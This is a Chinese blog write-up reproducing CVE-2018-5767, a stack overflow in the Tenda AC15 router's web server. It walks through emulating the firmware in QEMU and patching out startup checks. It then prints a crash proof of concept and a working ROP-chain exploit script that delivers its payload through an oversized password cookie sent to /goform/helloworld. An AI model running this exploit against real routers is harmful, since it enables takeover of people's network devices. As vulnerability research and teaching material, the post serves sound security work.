cve-2018-5767 路由器栈溢出漏洞复现

于 2022-02-15 18:00:00 发布
阅读量1.4k 收藏 6
点赞数 1
文章标签: 信息安全 python java 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38154820/article/details/122955197
版权

点击蓝字

89572268f3a096412817c57eb7371aaf.png

关注我们

一、前言

本文通过arm架构的路由器栈溢出漏洞为例介绍IOT固件分析以及arm架构下的栈溢出利用。漏洞产生的原因是未对用户的输入进行合理的限制而直接使用sscanf函数拷贝到栈上,从而引发的栈溢出的情况。

实验环境

1、Ubuntu 18.04 

2、qemu 2.11.1

3、ida pro 7.6

4、路由器固件:Tenda AC15 15.03.1.16_multi

5、固件下载地址:

https://drivers.softpedia.com/dyn-postdownload.php/d27e8410d32cd9de63a3506c47ded1bc/61ff85c5/75eb7/4/1

二、固件仿真

下载固件后,通过binwalk工具导出固件文件系统,进入squashfs-root文件夹。

binwalk -Me US_AC15V1.0BR_V15.03.1.16_multi_TD01.rar
cd _US_AC15V1.0BR_V15.03.1.16_multi_TD01.rar.extracted/squashfs-root/

使用readelf判断架构信息,为32位的小端arm架构。

e97d14c7e9f8a2c7cca94f0bdc6b7c71.png

使用qemu配合chroot启动/bin/httpd文件

sudo apt install qemu-user-static libc6-arm* libc6-dev-arm*
cp /usr/bin/qemu-arm-static .
sudo chroot ./ ./qemu-arm-static ./bin/httpd

d6aced5eedf2179fb3cc74c325315235.png

发现输出"Welcome to..."字符串后程序未继续执行,使用ida搜索发现字符串三处引用,进入第一处索引。

071de835ed7c3c89b27bfd2467c5f707.png

通过对汇编代码的分析不难发现,只需为R3赋值大于等于1即可跳出死循环。

c9367b4f2dd4faf011999599a5e6d9fc.png

使用Keypatch工具修改对应汇编代码,并在Edit-->Patch program-->Apply patches to input file中保存修改后的文件。

bca4cb873715296758a1d735bc549fff.png

替换掉原先的httpd文件并赋予执行权限后重新启动,发现如下报错

connect: No such file or directory
Connect to server failed.
connect cfm failed!

重新回到ida中查询调用,发现第二处判断,修改R3的办法与上面相同这里就不多赘述。

1bd0adbc1117ded81520b3dd00c9355c.png

再次执行程序,可以看到已经在正常监听端口了但是IP获取出现问题。

87e3ec0636eb5300f92bcfe89f8f7034.png

在网上查阅资料后发现问题点是名为get_eth_name的外部函数引起的,其定义库为libChipApi.so

b71dda283d61a4db1dc719b48fda1a1f.png

在本机建立虚拟网桥br0并重新执行程序

sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 eth0
sudo ifconfig br0 up
sudo dhclient br0
sudo chroot ./ ./qemu-arm-static ./bin/httpd

881bffa46daa8f79a7d13cf90f23189d.png


可以看到获取到的已经是本机的ip地址,仿真完成。

三、漏洞利用

在cve公布的poc中我们得知溢出点位于R7WebsSecurityHandler函数中,由于未对用户的请求进行合理的限制而直接使用sscanf函数讲用户输入复制到栈上。

bd03db2f6119a2486d2514fc9cba2658.png

而要想到达溢出点则需要满足url请求可以进入此if判断内,不难看出我们只要构造诸如"/goform/helloworld"即可进入if条件。

0f45c0899cf8289c45357d98375f4fc3.png

使用python脚本模拟请求令目标程序触发栈溢出崩溃。

import requests
URL = "http://192.168.107.142:81/goform/helloworld"
cookie = {"Cookie":"password="+"a"*0x400}
requests.get(url=URL, cookies=cookie)

使用gdb-multiarch调试程序,首先修改程序启动命令

sudo chroot ./ ./qemu-arm-static -g 1234 ./bin/httpd

然后启用调试工具并设置断点在函数退出时的地址。

gdb-multiarch ./bin/httpd
target remote :1234
b *0x002ED18
continue

执行python脚本,发现程序并没有正常退出函数,而是断在了其他位置

0e2b342f6fe0f52e296a1a96b11b3e5f.png

使用bt命令查看调用路径,发现0x2c5cc在溢出后被执行,而这个子函数势必会干扰我们的利用。

2fc33cb15c37c709123d0508ba444a1f.png

回到漏洞函数中,我们发现如下代码,观察后发现只要我们的请求中包含诸如".png"的字样就可以直接令漏洞函数返回。

281af6e24d556c63ef0b211d25224890.png

修改python脚本并重新进行测试,成功修改函数返回地址。同时发现填充的字符串最低位发生了变化,这是因为arm模式与thumb模式的切换问题。在函数退出时执行了pop pc的操作,而其最低有效位(LSB)将会被写入到CPSR寄存器的T位中,而pc本身的最低位则会被置零。所以我们在计算偏移的时候这个地方需要注意。

e69521c7087e21badd8bc5a4129cc522.png

因为httpd开启NX保护的缘故,所以我们通过构造ropchain的方式完成利用。使用ropper工具从/lib/libc.so.0中查找所要用到的gadget,并且因为QEMU模拟并未开启地址随机化的缘故,所以我们可以在gdb中使用vmmap命令找到libc的基地址从而计算出我们需要的gadget。我这边选取了这俩段gadget来进行最终的利用。

0x00040cb8  mov r0, sp; blx r3;
0x00018298  pop {r3, pc};

EXP

import requests
from pwn import *

base = 0xff5d5000
libc = ELF('./lib/libc.so.0')

puts = base+libc.sym['puts']
_str = "Hello\x00"
mov_r0 = base+0x00040cb8 # mov r0, sp; blx r3;
pop_r3 = base+0x00018298 # pop {r3, pc};
URL = "http://192.168.107.142:81/goform/helloworld"
pl = 'a'*448+p32(pop_r3)+p32(puts)+p32(mov_r0)+_str
cookie = {"Cookie":"password="+pl+".png"}
requests.get(url=URL, cookies=cookie)

d40ef1b5711470696744f9c99b22f410.png

ed4519638861bc3a4ed517531dc5a0b7.png

四、总结

通过此漏洞初步了解到IOT安全中固件分析的知识,拿来入门还是很好的。

实操推荐-D-Link路由器后门分析

https://www.hetianlab.com/expc.do?ce=35ffd251-fae0-4fba-9e6f-ae265ae10e60https://www.hetianlab.com/loginLab.do?pk_campaign=weixin-wemedia#stu

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

96c379425be041374a8a7eb74a745f27.gif

体验靶场实操,戳“阅读原文”体验

蚁景网安实验室
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
博客
记某项目的二顾茅庐5K实战
08-27 344
本文记录了针对某项目多个漏洞的挖掘过程。漏洞一:存在逻辑缺陷导致无限发布新动态和可修改动态问题;漏洞二:存在突破发布数量限制的问题;漏洞三:查询处因设计缺陷存在拒绝服务攻击漏洞。总结的挖掘思路:突破限制,反其道而行之。
博客
利用子域的System权限通往父域
08-23 400
最近翻阅笔记发现一篇文章提到通过子域的System权限可以突破获取到父域权限,本文将对此技术进行尝试复现研究。
博客
LLVM IR 深入研究分析
08-20 925
LLVM是C++编写的构架编译器的框架系统,可用于优化以任意程序语言编写的程序。LLVM IR可以理解为LLVM平台的汇编语言,所以官方也是以语言参考手册(Language Reference Manual)的形式给出LLVM IR的文档说明。
博客
MFC框架软件逆向研究
08-14 591
MFC库是开发Windows应用程序的C++接口。MFC提供了面向对象的框架,采用面向对象技术,将大部分的Windows API 封装到C++类中,以类成员函数的形式提供给程序开发人员调用。
博客
游戏安全入门-扫雷分析&远程线程注入
08-13 886
无论学习什么,首先,我们应该有个目标,那么入门windows游戏安全,脑海中浮现出来的一个游戏 -- 扫雷,一款家喻户晓的游戏,虽然已经被大家分析的不能再透了,但是我觉得自己去分析一下还是极好的,把它作为一个小目标再好不过了。
博客
【总结】注册码泄露原理以及例题
08-09 253
该题目采用了SIMD指令集,该指令格式在CTF和攻防对抗中经常出现,可以提高执行效率的同时也可以增加逆向的难度。对于此类指令和题目,我们分析的方法是:遇到查意思,查的多了就跟看正常代码一样,采用动态分析。
博客
jwt伪造身份组组组合拳艰难通关
08-08 681
现在的攻防演练不再像以往那样一个漏洞直捣黄龙,而是需要各种组合拳才能信手拈来,但是有时候使尽浑身解数也不能称心如意。
博客
【实战】文件加密器进行逆向
08-07 362
实战可以大大提高自己,学习技术的目的就是能够在实战中运用。本次实战与实际息息相关,该软件具有加密某文件的功能。
博客
后门函数技术在二进制对抗中的应用
07-26 925
本次题目跟第七届HWS线下的re2有类似的地方,均有后门函数。二进制后门可以理解为:我们只需要修改某个字节或某个函数,就可以将加密的过程变成解密的过程,大大节省逆向成本。本题先对内置的dll进行解密,然后调用其加密函数对我们的txt进行加密,如果我们将加密的函数nop为解密函数,就可以直接解密,类比与RC4动态解密技术。
博客
某个OA系统的代码审计
07-23 520
2023年HVV中爆出来的洞了,但是有一些漏洞点修复了,刚好地市级的攻防演练中遇到了一个,想着把可能出现问题的点全部审计一下,顺便熟悉一下.net代码审计。ps:感兴趣的师傅们可以自行根据poc搜索源码。
博客
JMX 反序列化漏洞
07-18 843
前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点。JMX(Java Management Extensions,即 Java 管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。
博客
【总结】逻辑运算在Z3中运用+CTF习题
07-17 817
国际赛IrisCTF在前几天举办,遇到了一道有意思的题目,特来总结。题目并不是很难,没有复杂的ollvm混淆也没有复杂的加密,但是却一步一步引导我们去学习和总结。
博客
一道关于逆向的实战CTF题目分析
07-12 1141
本题自带call型花指令,考验选手对花指令的理解程度。加密属于基础的异或和左右移位加密。主要考察选手的基础能力,动态调试和写脚本的能力。在这篇文章,详细记录了我的分析过程,相信你会有很大收获。
博客
双一流高校某教学系统存在多个高危漏洞
07-11 773
信息搜集过程中,除了用常见子域名扫一遍,还可以通过空间搜索引擎手动搜索。我用的就是把学校名称或者缩写作为关键字,利用一系列语法进行挨个查看。进行信息搜索(你得有一套自己的信息搜集逻辑吧,不然连这个系统都找不到)后,找到一处教学管理系统,点击页面上方软件,点击蓝色链接,进入教学系统。
博客
Windows远程桌面的奇技淫巧
07-09 656
远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者连上提供微软终端机服务的计算机(称为服务端或远程计算机)。在获取权限后,针对3389进行展开,先查询3389端口是否开启,发现没有开启(也有可能更改了端口),则可以通过注册表进行手动启动。
博客
浅谈进程隐藏技术
07-07 829
在之前几篇文章已经学习了解了几种钩取的方法,这篇文章就利用钩取方式完成进程隐藏的效果。在实现进程隐藏时,首先需要明确遍历进程的方法。
博客
瑞友天翼应用虚拟化系统SQL注入漏洞
07-03 404
最近网上公开了一些瑞友天翼应用虚拟化系统的 SQL 注入漏洞,经过挖掘发现,还存在一些后台 SQL 注入漏洞。重点关注传入参数可控并且拼接到 SQL 语句中的代码。
博客
记某次攻防演练:大战UEditor并突破
06-28 564
UEditor作为热门常见漏洞,在大型企业集团中的.net老旧系统中非常常见,相关的利用方法以及绕过方法需要非常熟练,方可快人一步迅速拿下权限。最近参与某次攻防演练,通过前期信息收集,发现某靶标单位存在某域名备案。通过fofa搜索子域名站点,发现存在一个子域名的61000端口开放着一个后台,于是开始进行渗透。
博客
记录一次CMS的代码审计
06-26 684
本次代码审计使用了白加黑的手法,用黑盒的视角测试功能点,用白盒的方式作为验证,从而更加简单的找出了漏洞。
博客
浅谈热补丁的钩取方式
06-25 987
热补丁的钩取方式是为了解决内联钩取在多线程情况下会出错的情况,使用热补丁的钩取可以避免重复读写指令造成问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值